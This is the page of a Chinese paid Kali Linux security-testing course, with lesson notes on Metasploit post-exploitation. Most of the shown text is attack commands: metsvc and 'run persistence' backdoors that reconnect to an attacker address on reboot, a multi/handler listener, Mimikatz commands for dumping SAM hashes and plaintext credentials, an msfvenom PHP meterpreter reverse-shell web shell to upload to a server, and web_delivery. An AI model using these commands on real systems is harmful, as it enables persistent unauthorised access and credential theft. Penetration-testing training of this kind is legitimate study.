846人加入学习
(36人评价)
Kali Linux安全测试

爆款好课 NO.1

价格 ¥ 599.00
该课程属于 武官课程 请加入后再学习

持久shell

run metsvc -A 再目标打开一个端口,创建一个服务,上传执行文件

不支持加密,不支持身份认证

连接目标

use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337
set RHOST 1.1.1.1

另外一种,默认使用反向连接

run persistence -h

延迟10秒启动,重启时自动反向连接

run persistence -X -i 10 -p 4444 -r 1.1.1.1

 

run persistence -U -i 20 -p 4444 -r 1.1.1.1
run persistence -S -i 20 -p 4444 -r 1.1.1.1

 

Mimikatz

获取  msv ssp tspkg livessp 身份认证方式的凭据

wdigest 、kerbers查询内存中明文的密码

mimikatz_command -f a:: 通过犯错来获取有哪些模块

mimikatz_command -f samdump::hashes 查看bootkey lm/ntlm hash
mimikatz_command -f handle::list 查看当前系统进程,也可以停
mimikatz_command -f service::list 查看有哪些服务,可以停

mimikatz_command -f crypto::listProviders 查看支持的加密套件

mimikatz_command -f winmine::infos 查看雷的信息,这是一个关于扫雷的模块 

 

PHP shell

java的也行,asp的也行

msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f
raw -o a.php

上传到服务器,用浏览器访问,msf侦听

Web Delivery

利用系统代码执行漏洞

use exploit/multi/script/web_delivery

 

 

[展开全文]